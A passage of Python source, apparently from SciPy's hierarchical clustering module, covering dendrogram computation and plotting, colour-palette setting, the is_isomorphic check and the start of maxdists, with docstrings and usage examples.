45, np.inf: 90}\n_dtextsortedkeys = list(_dtextsizes.keys())\n_dtextsortedkeys.sort()\n_drotationsortedkeys = list(_drotation.keys())\n_drotationsortedkeys.sort()\n\n\ndef _remove_dups(L):\n \"\"\"\n Remove duplicates AND preserve the original order of the elements.\n\n The set class is not guaranteed to do this.\n \"\"\"\n seen_before = set()\n L2 = []\n for i in L:\n if i not in seen_before:\n seen_before.add(i)\n L2.append(i)\n return L2\n\n\ndef _get_tick_text_size(p):\n for k in _dtextsortedkeys:\n if p <= k:\n return _dtextsizes[k]\n\n\ndef _get_tick_rotation(p):\n for k in _drotationsortedkeys:\n if p <= k:\n return _drotation[k]\n\n\ndef _plot_dendrogram(icoords, dcoords, ivl, p, n, mh, orientation,\n no_labels, color_list, leaf_font_size=None,\n leaf_rotation=None, contraction_marks=None,\n ax=None, above_threshold_color='C0'):\n # Import matplotlib here so that it's not imported unless dendrograms\n # are plotted. Raise an informative error if importing fails.\n try:\n # if an axis is provided, don't use pylab at all\n if ax is None:\n import matplotlib.pylab\n import matplotlib.patches\n import matplotlib.collections\n except ImportError as e:\n raise ImportError(\"You must install the matplotlib library to plot \"\n \"the dendrogram. Use no_plot=True to calculate the \"\n \"dendrogram without plotting.\") from e\n\n if ax is None:\n ax = matplotlib.pylab.gca()\n # if we're using pylab, we want to trigger a draw at the end\n trigger_redraw = True\n else:\n trigger_redraw = False\n\n # Independent variable plot width\n ivw = len(ivl) * 10\n # Dependent variable plot height\n dvw = mh + mh * 0.05\n\n iv_ticks = np.arange(5, len(ivl) * 10 + 5, 10)\n if orientation in ('top', 'bottom'):\n if orientation == 'top':\n ax.set_ylim([0, dvw])\n ax.set_xlim([0, ivw])\n else:\n ax.set_ylim([dvw, 0])\n ax.set_xlim([0, ivw])\n\n xlines = icoords\n ylines = dcoords\n if no_labels:\n ax.set_xticks([])\n ax.set_xticklabels([])\n else:\n ax.set_xticks(iv_ticks)\n\n if orientation == 'top':\n ax.xaxis.set_ticks_position('bottom')\n else:\n ax.xaxis.set_ticks_position('top')\n\n # Make the tick marks invisible because they cover up the links\n for line in ax.get_xticklines():\n line.set_visible(False)\n\n leaf_rot = (float(_get_tick_rotation(len(ivl)))\n if (leaf_rotation is None) else leaf_rotation)\n leaf_font = (float(_get_tick_text_size(len(ivl)))\n if (leaf_font_size is None) else leaf_font_size)\n ax.set_xticklabels(ivl, rotation=leaf_rot, size=leaf_font)\n\n elif orientation in ('left', 'right'):\n if orientation == 'left':\n ax.set_xlim([dvw, 0])\n ax.set_ylim([0, ivw])\n else:\n ax.set_xlim([0, dvw])\n ax.set_ylim([0, ivw])\n\n xlines = dcoords\n ylines = icoords\n if no_labels:\n ax.set_yticks([])\n ax.set_yticklabels([])\n else:\n ax.set_yticks(iv_ticks)\n\n if orientation == 'left':\n ax.yaxis.set_ticks_position('right')\n else:\n ax.yaxis.set_ticks_position('left')\n\n # Make the tick marks invisible because they cover up the links\n for line in ax.get_yticklines():\n line.set_visible(False)\n\n leaf_font = (float(_get_tick_text_size(len(ivl)))\n if (leaf_font_size is None) else leaf_font_size)\n\n if leaf_rotation is not None:\n ax.set_yticklabels(ivl, rotation=leaf_rotation, size=leaf_font)\n else:\n ax.set_yticklabels(ivl, size=leaf_font)\n\n # Let's use collections instead. This way there is a separate legend item\n # for each tree grouping, rather than stupidly one for each line segment.\n colors_used = _remove_dups(color_list)\n color_to_lines = {}\n for color in colors_used:\n color_to_lines[color] = []\n for (xline, yline, color) in zip(xlines, ylines, color_list):\n color_to_lines[color].append(list(zip(xline, yline)))\n\n colors_to_collections = {}\n # Construct the collections.\n for color in colors_used:\n coll = matplotlib.collections.LineCollection(color_to_lines[color],\n colors=(color,))\n colors_to_collections[color] = coll\n\n # Add all the groupings below the color threshold.\n for color in colors_used:\n if color != above_threshold_color:\n ax.add_collection(colors_to_collections[color])\n # If there's a grouping of links above the color threshold, it goes last.\n if above_threshold_color in colors_to_collections:\n ax.add_collection(colors_to_collections[above_threshold_color])\n\n if contraction_marks is not None:\n Ellipse = matplotlib.patches.Ellipse\n for (x, y) in contraction_marks:\n if orientation in ('left', 'right'):\n e = Ellipse((y, x), width=dvw / 100, height=1.0)\n else:\n e = Ellipse((x, y), width=1.0, height=dvw / 100)\n ax.add_artist(e)\n e.set_clip_box(ax.bbox)\n e.set_alpha(0.5)\n e.set_facecolor('k')\n\n if trigger_redraw:\n matplotlib.pylab.draw_if_interactive()\n\n\n# C0 is used for above threshold color\n_link_line_colors_default = ('C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9')\n_link_line_colors = list(_link_line_colors_default)\n\n\ndef set_link_color_palette(palette):\n \"\"\"\n Set list of matplotlib color codes for use by dendrogram.\n\n Note that this palette is global (i.e., setting it once changes the colors\n for all subsequent calls to `dendrogram`) and that it affects only the\n the colors below ``color_threshold``.\n\n Note that `dendrogram` also accepts a custom coloring function through its\n ``link_color_func`` keyword, which is more flexible and non-global.\n\n Parameters\n ----------\n palette : list of str or None\n A list of matplotlib color codes. The order of the color codes is the\n order in which the colors are cycled through when color thresholding in\n the dendrogram.\n\n If ``None``, resets the palette to its default (which are matplotlib\n default colors C1 to C9).\n\n Returns\n -------\n None\n\n See Also\n --------\n dendrogram\n\n Notes\n -----\n Ability to reset the palette with ``None`` added in SciPy 0.17.0.\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster import hierarchy\n >>> ytdist = np.array([662., 877., 255., 412., 996., 295., 468., 268.,\n ... 400., 754., 564., 138., 219., 869., 669.])\n >>> Z = hierarchy.linkage(ytdist, 'single')\n >>> dn = hierarchy.dendrogram(Z, no_plot=True)\n >>> dn['color_list']\n ['C1', 'C0', 'C0', 'C0', 'C0']\n >>> hierarchy.set_link_color_palette(['c', 'm', 'y', 'k'])\n >>> dn = hierarchy.dendrogram(Z, no_plot=True, above_threshold_color='b')\n >>> dn['color_list']\n ['c', 'b', 'b', 'b', 'b']\n >>> dn = hierarchy.dendrogram(Z, no_plot=True, color_threshold=267,\n ... above_threshold_color='k')\n >>> dn['color_list']\n ['c', 'm', 'm', 'k', 'k']\n\n Now, reset the color palette to its default:\n\n >>> hierarchy.set_link_color_palette(None)\n\n \"\"\"\n if palette is None:\n # reset to its default\n palette = _link_line_colors_default\n elif not isinstance(palette, (list, tuple)):\n raise TypeError(\"palette must be a list or tuple\")\n _ptypes = [isinstance(p, str) for p in palette]\n\n if False in _ptypes:\n raise TypeError(\"all palette list elements must be color strings\")\n\n global _link_line_colors\n _link_line_colors = palette\n\n\ndef dendrogram(Z, p=30, truncate_mode=None, color_threshold=None,\n get_leaves=True, orientation='top', labels=None,\n count_sort=False, distance_sort=False, show_leaf_counts=True,\n no_plot=False, no_labels=False, leaf_font_size=None,\n leaf_rotation=None, leaf_label_func=None,\n show_contracted=False, link_color_func=None, ax=None,\n above_threshold_color='C0'):\n \"\"\"\n Plot the hierarchical clustering as a dendrogram.\n\n The dendrogram illustrates how each cluster is\n composed by drawing a U-shaped link between a non-singleton\n cluster and its children. The top of the U-link indicates a\n cluster merge. The two legs of the U-link indicate which clusters\n were merged. The length of the two legs of the U-link represents\n the distance between the child clusters. It is also the\n cophenetic distance between original observations in the two\n children clusters.\n\n Parameters\n ----------\n Z : ndarray\n The linkage matrix encoding the hierarchical clustering to\n render as a dendrogram. See the ``linkage`` function for more\n information on the format of ``Z``.\n p : int, optional\n The ``p`` parameter for ``truncate_mode``.\n truncate_mode : str, optional\n The dendrogram can be hard to read when the original\n observation matrix from which the linkage is derived is\n large. Truncation is used to condense the dendrogram. There\n are several modes:\n\n ``None``\n No truncation is performed (default).\n Note: ``'none'`` is an alias for ``None`` that's kept for\n backward compatibility.\n\n ``'lastp'``\n The last ``p`` non-singleton clusters formed in the linkage are the\n only non-leaf nodes in the linkage; they correspond to rows\n ``Z[n-p-2:end]`` in ``Z``. All other non-singleton clusters are\n contracted into leaf nodes.\n\n ``'level'``\n No more than ``p`` levels of the dendrogram tree are displayed.\n A \"level\" includes all nodes with ``p`` merges from the final merge.\n\n Note: ``'mtica'`` is an alias for ``'level'`` that's kept for\n backward compatibility.\n\n color_threshold : double, optional\n For brevity, let :math:`t` be the ``color_threshold``.\n Colors all the descendent links below a cluster node\n :math:`k` the same color if :math:`k` is the first node below\n the cut threshold :math:`t`. All links connecting nodes with\n distances greater than or equal to the threshold are colored\n with de default matplotlib color ``'C0'``. If :math:`t` is less\n than or equal to zero, all nodes are colored ``'C0'``.\n If ``color_threshold`` is None or 'default',\n corresponding with MATLAB(TM) behavior, the threshold is set to\n ``0.7*max(Z[:,2])``.\n\n get_leaves : bool, optional\n Includes a list ``R['leaves']=H`` in the result\n dictionary. For each :math:`i`, ``H[i] == j``, cluster node\n ``j`` appears in position ``i`` in the left-to-right traversal\n of the leaves, where :math:`j < 2n-1` and :math:`i < n`.\n orientation : str, optional\n The direction to plot the dendrogram, which can be any\n of the following strings:\n\n ``'top'``\n Plots the root at the top, and plot descendent links going downwards.\n (default).\n\n ``'bottom'``\n Plots the root at the bottom, and plot descendent links going\n upwards.\n\n ``'left'``\n Plots the root at the left, and plot descendent links going right.\n\n ``'right'``\n Plots the root at the right, and plot descendent links going left.\n\n labels : ndarray, optional\n By default, ``labels`` is None so the index of the original observation\n is used to label the leaf nodes. Otherwise, this is an :math:`n`-sized\n sequence, with ``n == Z.shape[0] + 1``. The ``labels[i]`` value is the\n text to put under the :math:`i` th leaf node only if it corresponds to\n an original observation and not a non-singleton cluster.\n count_sort : str or bool, optional\n For each node n, the order (visually, from left-to-right) n's\n two descendent links are plotted is determined by this\n parameter, which can be any of the following values:\n\n ``False``\n Nothing is done.\n\n ``'ascending'`` or ``True``\n The child with the minimum number of original objects in its cluster\n is plotted first.\n\n ``'descending'``\n The child with the maximum number of original objects in its cluster\n is plotted first.\n\n Note, ``distance_sort`` and ``count_sort`` cannot both be True.\n distance_sort : str or bool, optional\n For each node n, the order (visually, from left-to-right) n's\n two descendent links are plotted is determined by this\n parameter, which can be any of the following values:\n\n ``False``\n Nothing is done.\n\n ``'ascending'`` or ``True``\n The child with the minimum distance between its direct descendents is\n plotted first.\n\n ``'descending'``\n The child with the maximum distance between its direct descendents is\n plotted first.\n\n Note ``distance_sort`` and ``count_sort`` cannot both be True.\n show_leaf_counts : bool, optional\n When True, leaf nodes representing :math:`k>1` original\n observation are labeled with the number of observations they\n contain in parentheses.\n no_plot : bool, optional\n When True, the final rendering is not performed. This is\n useful if only the data structures computed for the rendering\n are needed or if matplotlib is not available.\n no_labels : bool, optional\n When True, no labels appear next to the leaf nodes in the\n rendering of the dendrogram.\n leaf_rotation : double, optional\n Specifies the angle (in degrees) to rotate the leaf\n labels. When unspecified, the rotation is based on the number of\n nodes in the dendrogram (default is 0).\n leaf_font_size : int, optional\n Specifies the font size (in points) of the leaf labels. When\n unspecified, the size based on the number of nodes in the\n dendrogram.\n leaf_label_func : lambda or function, optional\n When ``leaf_label_func`` is a callable function, for each\n leaf with cluster index :math:`k < 2n-1`. The function\n is expected to return a string with the label for the\n leaf.\n\n Indices :math:`k < n` correspond to original observations\n while indices :math:`k \\\\geq n` correspond to non-singleton\n clusters.\n\n For example, to label singletons with their node id and\n non-singletons with their id, count, and inconsistency\n coefficient, simply do::\n\n # First define the leaf label function.\n def llf(id):\n if id < n:\n return str(id)\n else:\n return '[%d %d %1.2f]' % (id, count, R[n-id,3])\n\n # The text for the leaf nodes is going to be big so force\n # a rotation of 90 degrees.\n dendrogram(Z, leaf_label_func=llf, leaf_rotation=90)\n\n # leaf_label_func can also be used together with ``truncate_mode`` parameter,\n # in which case you will get your leaves labeled after truncation:\n dendrogram(Z, leaf_label_func=llf, leaf_rotation=90,\n truncate_mode='level', p=2)\n\n show_contracted : bool, optional\n When True the heights of non-singleton nodes contracted\n into a leaf node are plotted as crosses along the link\n connecting that leaf node. This really is only useful when\n truncation is used (see ``truncate_mode`` parameter).\n link_color_func : callable, optional\n If given, `link_color_function` is called with each non-singleton id\n corresponding to each U-shaped link it will paint. The function is\n expected to return the color to paint the link, encoded as a matplotlib\n color string code. For example::\n\n dendrogram(Z, link_color_func=lambda k: colors[k])\n\n colors the direct links below each untruncated non-singleton node\n ``k`` using ``colors[k]``.\n ax : matplotlib Axes instance, optional\n If None and `no_plot` is not True, the dendrogram will be plotted\n on the current axes. Otherwise if `no_plot` is not True the\n dendrogram will be plotted on the given ``Axes`` instance. This can be\n useful if the dendrogram is part of a more complex figure.\n above_threshold_color : str, optional\n This matplotlib color string sets the color of the links above the\n color_threshold. The default is ``'C0'``.\n\n Returns\n -------\n R : dict\n A dictionary of data structures computed to render the\n dendrogram. Its has the following keys:\n\n ``'color_list'``\n A list of color names. The k'th element represents the color of the\n k'th link.\n\n ``'icoord'`` and ``'dcoord'``\n Each of them is a list of lists. Let ``icoord = [I1, I2, ..., Ip]``\n where ``Ik = [xk1, xk2, xk3, xk4]`` and ``dcoord = [D1, D2, ..., Dp]``\n where ``Dk = [yk1, yk2, yk3, yk4]``, then the k'th link painted is\n ``(xk1, yk1)`` - ``(xk2, yk2)`` - ``(xk3, yk3)`` - ``(xk4, yk4)``.\n\n ``'ivl'``\n A list of labels corresponding to the leaf nodes.\n\n ``'leaves'``\n For each i, ``H[i] == j``, cluster node ``j`` appears in position\n ``i`` in the left-to-right traversal of the leaves, where\n :math:`j < 2n-1` and :math:`i < n`. If ``j`` is less than ``n``, the\n ``i``-th leaf node corresponds to an original observation.\n Otherwise, it corresponds to a non-singleton cluster.\n\n ``'leaves_color_list'``\n A list of color names. The k'th element represents the color of the\n k'th leaf.\n\n See Also\n --------\n linkage, set_link_color_palette\n\n Notes\n -----\n It is expected that the distances in ``Z[:,2]`` be monotonic, otherwise\n crossings appear in the dendrogram.\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster import hierarchy\n >>> import matplotlib.pyplot as plt\n\n A very basic example:\n\n >>> ytdist = np.array([662., 877., 255., 412., 996., 295., 468., 268.,\n ... 400., 754., 564., 138., 219., 869., 669.])\n >>> Z = hierarchy.linkage(ytdist, 'single')\n >>> plt.figure()\n >>> dn = hierarchy.dendrogram(Z)\n\n Now, plot in given axes, improve the color scheme and use both vertical and\n horizontal orientations:\n\n >>> hierarchy.set_link_color_palette(['m', 'c', 'y', 'k'])\n >>> fig, axes = plt.subplots(1, 2, figsize=(8, 3))\n >>> dn1 = hierarchy.dendrogram(Z, ax=axes[0], above_threshold_color='y',\n ... orientation='top')\n >>> dn2 = hierarchy.dendrogram(Z, ax=axes[1],\n ... above_threshold_color='#bcbddc',\n ... orientation='right')\n >>> hierarchy.set_link_color_palette(None) # reset to default after use\n >>> plt.show()\n\n \"\"\"\n # This feature was thought about but never implemented (still useful?):\n #\n # ... = dendrogram(..., leaves_order=None)\n #\n # Plots the leaves in the order specified by a vector of\n # original observation indices. If the vector contains duplicates\n # or results in a crossing, an exception will be thrown. Passing\n # None orders leaf nodes based on the order they appear in the\n # pre-order traversal.\n Z = as_xparray(Z, order='c')\n\n if orientation not in [\"top\", \"left\", \"bottom\", \"right\"]:\n raise ValueError(\"orientation must be one of 'top', 'left', \"\n \"'bottom', or 'right'\")\n\n if labels is not None:\n try:\n len_labels = len(labels)\n except (TypeError, AttributeError):\n len_labels = labels.shape[0]\n if Z.shape[0] + 1 != len_labels:\n raise ValueError(\"Dimensions of Z and labels must be consistent.\")\n\n is_valid_linkage(Z, throw=True, name='Z')\n Zs = Z.shape\n n = Zs[0] + 1\n if isinstance(p, (int, float)):\n p = int(p)\n else:\n raise TypeError('The second argument must be a number')\n\n if truncate_mode not in ('lastp', 'mtica', 'level', 'none', None):\n # 'mtica' is kept working for backwards compat.\n raise ValueError('Invalid truncation mode.')\n\n if truncate_mode == 'lastp':\n if p > n or p == 0:\n p = n\n\n if truncate_mode == 'mtica':\n # 'mtica' is an alias\n truncate_mode = 'level'\n\n if truncate_mode == 'level':\n if p <= 0:\n p = np.inf\n\n if get_leaves:\n lvs = []\n else:\n lvs = None\n\n icoord_list = []\n dcoord_list = []\n color_list = []\n current_color = [0]\n currently_below_threshold = [False]\n ivl = [] # list of leaves\n\n if color_threshold is None or (isinstance(color_threshold, str) and\n color_threshold == 'default'):\n color_threshold = max(Z[:, 2]) * 0.7\n\n R = {'icoord': icoord_list, 'dcoord': dcoord_list, 'ivl': ivl,\n 'leaves': lvs, 'color_list': color_list}\n\n # Empty list will be filled in _dendrogram_calculate_info\n contraction_marks = [] if show_contracted else None\n\n _dendrogram_calculate_info(\n Z=Z, p=p,\n truncate_mode=truncate_mode,\n color_threshold=color_threshold,\n get_leaves=get_leaves,\n orientation=orientation,\n labels=labels,\n count_sort=count_sort,\n distance_sort=distance_sort,\n show_leaf_counts=show_leaf_counts,\n i=2*n - 2,\n iv=0.0,\n ivl=ivl,\n n=n,\n icoord_list=icoord_list,\n dcoord_list=dcoord_list,\n lvs=lvs,\n current_color=current_color,\n color_list=color_list,\n currently_below_threshold=currently_below_threshold,\n leaf_label_func=leaf_label_func,\n contraction_marks=contraction_marks,\n link_color_func=link_color_func,\n above_threshold_color=above_threshold_color)\n\n if not no_plot:\n mh = max(Z[:, 2])\n _plot_dendrogram(icoord_list, dcoord_list, ivl, p, n, mh, orientation,\n no_labels, color_list,\n leaf_font_size=leaf_font_size,\n leaf_rotation=leaf_rotation,\n contraction_marks=contraction_marks,\n ax=ax,\n above_threshold_color=above_threshold_color)\n\n R[\"leaves_color_list\"] = _get_leaves_color_list(R)\n\n return R\n\n\ndef _get_leaves_color_list(R):\n leaves_color_list = [None] * len(R['leaves'])\n for link_x, link_y, link_color in zip(R['icoord'],\n R['dcoord'],\n R['color_list']):\n for (xi, yi) in zip(link_x, link_y):\n if yi == 0.0 and (xi % 5 == 0 and xi % 2 == 1):\n # if yi is 0.0 and xi is divisible by 5 and odd,\n # the point is a leaf\n # xi of leaves are 5, 15, 25, 35, ... (see `iv_ticks`)\n # index of leaves are 0, 1, 2, 3, ... as below\n leaf_index = (int(xi) - 5) // 10\n # each leaf has a same color of its link.\n leaves_color_list[leaf_index] = link_color\n return leaves_color_list\n\n\ndef _append_singleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,\n i, labels):\n # If the leaf id structure is not None and is a list then the caller\n # to dendrogram has indicated that cluster id's corresponding to the\n # leaf nodes should be recorded.\n\n if lvs is not None:\n lvs.append(int(i))\n\n # If leaf node labels are to be displayed...\n if ivl is not None:\n # If a leaf_label_func has been provided, the label comes from the\n # string returned from the leaf_label_func, which is a function\n # passed to dendrogram.\n if leaf_label_func:\n ivl.append(leaf_label_func(int(i)))\n else:\n # Otherwise, if the dendrogram caller has passed a labels list\n # for the leaf nodes, use it.\n if labels is not None:\n ivl.append(labels[int(i - n)])\n else:\n # Otherwise, use the id as the label for the leaf.x\n ivl.append(str(int(i)))\n\n\ndef _append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,\n i, labels, show_leaf_counts):\n # If the leaf id structure is not None and is a list then the caller\n # to dendrogram has indicated that cluster id's corresponding to the\n # leaf nodes should be recorded.\n\n if lvs is not None:\n lvs.append(int(i))\n if ivl is not None:\n if leaf_label_func:\n ivl.append(leaf_label_func(int(i)))\n else:\n if show_leaf_counts:\n ivl.append(\"(\" + str(np.asarray(Z[i - n, 3], dtype=np.int64)) + \")\")\n else:\n ivl.append(\"\")\n\n\ndef _append_contraction_marks(Z, iv, i, n, contraction_marks, xp):\n _append_contraction_marks_sub(Z, iv, int_floor(Z[i - n, 0], xp),\n n, contraction_marks, xp)\n _append_contraction_marks_sub(Z, iv, int_floor(Z[i - n, 1], xp),\n n, contraction_marks, xp)\n\n\ndef _append_contraction_marks_sub(Z, iv, i, n, contraction_marks, xp):\n if i >= n:\n contraction_marks.append((iv, Z[i - n, 2]))\n _append_contraction_marks_sub(Z, iv, int_floor(Z[i - n, 0], xp),\n n, contraction_marks, xp)\n _append_contraction_marks_sub(Z, iv, int_floor(Z[i - n, 1], xp),\n n, contraction_marks, xp)\n\n\ndef _dendrogram_calculate_info(Z, p, truncate_mode,\n color_threshold=np.inf, get_leaves=True,\n orientation='top', labels=None,\n count_sort=False, distance_sort=False,\n show_leaf_counts=False, i=-1, iv=0.0,\n ivl=[], n=0, icoord_list=[], dcoord_list=[],\n lvs=None, mhr=False,\n current_color=[], color_list=[],\n currently_below_threshold=[],\n leaf_label_func=None, level=0,\n contraction_marks=None,\n link_color_func=None,\n above_threshold_color='C0'):\n \"\"\"\n Calculate the endpoints of the links as well as the labels for the\n the dendrogram rooted at the node with index i. iv is the independent\n variable value to plot the left-most leaf node below the root node i\n (if orientation='top', this would be the left-most x value where the\n plotting of this root node i and its descendents should begin).\n\n ivl is a list to store the labels of the leaf nodes. The leaf_label_func\n is called whenever ivl != None, labels == None, and\n leaf_label_func != None. When ivl != None and labels != None, the\n labels list is used only for labeling the leaf nodes. When\n ivl == None, no labels are generated for leaf nodes.\n\n When get_leaves==True, a list of leaves is built as they are visited\n in the dendrogram.\n\n Returns a tuple with l being the independent variable coordinate that\n corresponds to the midpoint of cluster to the left of cluster i if\n i is non-singleton, otherwise the independent coordinate of the leaf\n node if i is a leaf node.\n\n Returns\n -------\n A tuple (left, w, h, md), where:\n * left is the independent variable coordinate of the center of the\n the U of the subtree\n\n * w is the amount of space used for the subtree (in independent\n variable units)\n\n * h is the height of the subtree in dependent variable units\n\n * md is the ``max(Z[*,2]``) for all nodes ``*`` below and including\n the target node.\n\n \"\"\"\n xp = array_namespace(Z)\n if n == 0:\n raise ValueError(\"Invalid singleton cluster count n.\")\n\n if i == -1:\n raise ValueError(\"Invalid root cluster index i.\")\n\n if truncate_mode == 'lastp':\n # If the node is a leaf node but corresponds to a non-singleton\n # cluster, its label is either the empty string or the number of\n # original observations belonging to cluster i.\n if 2*n - p > i >= n:\n d = Z[i - n, 2]\n _append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,\n leaf_label_func, i, labels,\n show_leaf_counts)\n if contraction_marks is not None:\n _append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks, xp)\n return (iv + 5.0, 10.0, 0.0, d)\n elif i < n:\n _append_singleton_leaf_node(Z, p, n, level, lvs, ivl,\n leaf_label_func, i, labels)\n return (iv + 5.0, 10.0, 0.0, 0.0)\n elif truncate_mode == 'level':\n if i > n and level > p:\n d = Z[i - n, 2]\n _append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,\n leaf_label_func, i, labels,\n show_leaf_counts)\n if contraction_marks is not None:\n _append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks, xp)\n return (iv + 5.0, 10.0, 0.0, d)\n elif i < n:\n _append_singleton_leaf_node(Z, p, n, level, lvs, ivl,\n leaf_label_func, i, labels)\n return (iv + 5.0, 10.0, 0.0, 0.0)\n\n # Otherwise, only truncate if we have a leaf node.\n #\n # Only place leaves if they correspond to original observations.\n if i < n:\n _append_singleton_leaf_node(Z, p, n, level, lvs, ivl,\n leaf_label_func, i, labels)\n return (iv + 5.0, 10.0, 0.0, 0.0)\n\n # !!! Otherwise, we don't have a leaf node, so work on plotting a\n # non-leaf node.\n # Actual indices of a and b\n aa = int_floor(Z[i - n, 0], xp)\n ab = int_floor(Z[i - n, 1], xp)\n if aa >= n:\n # The number of singletons below cluster a\n na = Z[aa - n, 3]\n # The distance between a's two direct children.\n da = Z[aa - n, 2]\n else:\n na = 1\n da = 0.0\n if ab >= n:\n nb = Z[ab - n, 3]\n db = Z[ab - n, 2]\n else:\n nb = 1\n db = 0.0\n\n if count_sort == 'ascending' or count_sort is True:\n # If a has a count greater than b, it and its descendents should\n # be drawn to the right. Otherwise, to the left.\n if na > nb:\n # The cluster index to draw to the left (ua) will be ab\n # and the one to draw to the right (ub) will be aa\n ua = ab\n ub = aa\n else:\n ua = aa\n ub = ab\n elif count_sort == 'descending':\n # If a has a count less than or equal to b, it and its\n # descendents should be drawn to the left. Otherwise, to\n # the right.\n if na > nb:\n ua = aa\n ub = ab\n else:\n ua = ab\n ub = aa\n elif distance_sort == 'ascending' or distance_sort is True:\n # If a has a distance greater than b, it and its descendents should\n # be drawn to the right. Otherwise, to the left.\n if da > db:\n ua = ab\n ub = aa\n else:\n ua = aa\n ub = ab\n elif distance_sort == 'descending':\n # If a has a distance less than or equal to b, it and its\n # descendents should be drawn to the left. Otherwise, to\n # the right.\n if da > db:\n ua = aa\n ub = ab\n else:\n ua = ab\n ub = aa\n else:\n ua = aa\n ub = ab\n\n # Updated iv variable and the amount of space used.\n (uiva, uwa, uah, uamd) = \\\n _dendrogram_calculate_info(\n Z=Z, p=p,\n truncate_mode=truncate_mode,\n color_threshold=color_threshold,\n get_leaves=get_leaves,\n orientation=orientation,\n labels=labels,\n count_sort=count_sort,\n distance_sort=distance_sort,\n show_leaf_counts=show_leaf_counts,\n i=ua, iv=iv, ivl=ivl, n=n,\n icoord_list=icoord_list,\n dcoord_list=dcoord_list, lvs=lvs,\n current_color=current_color,\n color_list=color_list,\n currently_below_threshold=currently_below_threshold,\n leaf_label_func=leaf_label_func,\n level=level + 1, contraction_marks=contraction_marks,\n link_color_func=link_color_func,\n above_threshold_color=above_threshold_color)\n\n h = Z[i - n, 2]\n if h >= color_threshold or color_threshold <= 0:\n c = above_threshold_color\n\n if currently_below_threshold[0]:\n current_color[0] = (current_color[0] + 1) % len(_link_line_colors)\n currently_below_threshold[0] = False\n else:\n currently_below_threshold[0] = True\n c = _link_line_colors[current_color[0]]\n\n (uivb, uwb, ubh, ubmd) = \\\n _dendrogram_calculate_info(\n Z=Z, p=p,\n truncate_mode=truncate_mode,\n color_threshold=color_threshold,\n get_leaves=get_leaves,\n orientation=orientation,\n labels=labels,\n count_sort=count_sort,\n distance_sort=distance_sort,\n show_leaf_counts=show_leaf_counts,\n i=ub, iv=iv + uwa, ivl=ivl, n=n,\n icoord_list=icoord_list,\n dcoord_list=dcoord_list, lvs=lvs,\n current_color=current_color,\n color_list=color_list,\n currently_below_threshold=currently_below_threshold,\n leaf_label_func=leaf_label_func,\n level=level + 1, contraction_marks=contraction_marks,\n link_color_func=link_color_func,\n above_threshold_color=above_threshold_color)\n\n max_dist = max(uamd, ubmd, h)\n\n icoord_list.append([uiva, uiva, uivb, uivb])\n dcoord_list.append([uah, h, h, ubh])\n if link_color_func is not None:\n v = link_color_func(int(i))\n if not isinstance(v, str):\n raise TypeError(\"link_color_func must return a matplotlib \"\n \"color string!\")\n color_list.append(v)\n else:\n color_list.append(c)\n\n return (((uiva + uivb) / 2), uwa + uwb, h, max_dist)\n\n\ndef is_isomorphic(T1, T2):\n \"\"\"\n Determine if two different cluster assignments are equivalent.\n\n Parameters\n ----------\n T1 : array_like\n An assignment of singleton cluster ids to flat cluster ids.\n T2 : array_like\n An assignment of singleton cluster ids to flat cluster ids.\n\n Returns\n -------\n b : bool\n Whether the flat cluster assignments `T1` and `T2` are\n equivalent.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n fcluster : for the creation of flat cluster assignments.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import fcluster, is_isomorphic\n >>> from scipy.cluster.hierarchy import single, complete\n >>> from scipy.spatial.distance import pdist\n\n Two flat cluster assignments can be isomorphic if they represent the same\n cluster assignment, with different labels.\n\n For example, we can use the `scipy.cluster.hierarchy.single`: method\n and flatten the output to four clusters:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = single(pdist(X))\n >>> T = fcluster(Z, 1, criterion='distance')\n >>> T\n array([3, 3, 3, 4, 4, 4, 2, 2, 2, 1, 1, 1], dtype=int32)\n\n We can then do the same using the\n `scipy.cluster.hierarchy.complete`: method:\n\n >>> Z = complete(pdist(X))\n >>> T_ = fcluster(Z, 1.5, criterion='distance')\n >>> T_\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n\n As we can see, in both cases we obtain four clusters and all the data\n points are distributed in the same way - the only thing that changes\n are the flat cluster labels (3 => 1, 4 =>2, 2 =>3 and 4 =>1), so both\n cluster assignments are isomorphic:\n\n >>> is_isomorphic(T, T_)\n True\n\n \"\"\"\n T1 = np.asarray(T1, order='c')\n T2 = np.asarray(T2, order='c')\n\n T1S = T1.shape\n T2S = T2.shape\n\n if len(T1S) != 1:\n raise ValueError('T1 must be one-dimensional.')\n if len(T2S) != 1:\n raise ValueError('T2 must be one-dimensional.')\n if T1S[0] != T2S[0]:\n raise ValueError('T1 and T2 must have the same number of elements.')\n n = T1S[0]\n d1 = {}\n d2 = {}\n for i in range(0, n):\n if T1[i] in d1:\n if T2[i] not in d2:\n return False\n if d1[T1[i]] != T2[i] or d2[T2[i]] != T1[i]:\n return False\n elif T2[i] in d2:\n return False\n else:\n d1[T1[i]] = T2[i]\n d2[T2[i]] = T1[i]\n return True\n\n\ndef maxdists(Z):\n \"\"\"\n Return the maximum distance between any non-singleton cluster.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a matrix. See\n ``linkage`` for more information.\n\n Returns\n -------\n maxdists : ndarray\n A ``(n-1)`` sized numpy array of doubles; ``MD[i]`` represents\n the maximum distance between any cluster (including\n singletons) below and including the node with index i. More\n specifically, ``MD[i] = Z[Q(i)-n, 2].max()`` where ``Q(i)`` is the\n set of all node indices below and including node i.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n is_monotonic : for testing for monotonicity of a linkage matrix.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, maxdists\n >>> from scipy.spatial.distance import pdist\n\n Given a linkage matrix ``Z``, `scipy.cluster.hierarchy.maxdists`\n computes for each new cluster 